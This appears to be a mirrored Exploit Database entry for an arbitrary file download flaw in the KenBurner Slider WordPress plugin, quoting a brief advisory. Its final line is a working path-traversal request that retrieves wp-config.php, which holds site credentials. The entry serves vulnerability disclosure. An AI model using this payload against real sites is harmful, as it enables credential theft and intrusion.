WordPress Plugin KenBurner Slider – ‘admin-ajax.php’ Arbitrary File Download

• Exploit Database
• 16 阅读

• 作者： MF0x
  日期： 2014-08-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39291/

• source: https://www.securityfocus.com/bid/69387/info
  
  The KenBurner Slider plugin for WordPress is prone to an arbitrary file-download vulnerability.
  
  An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information. 
  
  http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php